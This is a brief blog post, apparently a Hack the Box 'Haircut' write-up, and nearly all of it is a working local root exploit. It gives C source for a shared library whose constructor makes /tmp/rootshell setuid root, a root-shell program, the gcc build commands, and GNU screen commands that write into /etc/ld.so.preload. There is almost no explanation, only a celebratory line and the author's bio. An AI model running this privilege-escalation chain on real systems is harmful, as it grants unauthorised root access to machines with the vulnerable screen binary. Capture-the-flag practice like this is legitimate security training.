Haircut Hack the Box

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
cd /etc
umask 000
/usr/bin/screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
/usr/bin/screen -ls
/tmp/rootshell

yaaaaaaaay

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
dl padmavathi

dl padmavathi

I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail:pduggire@gmu.edu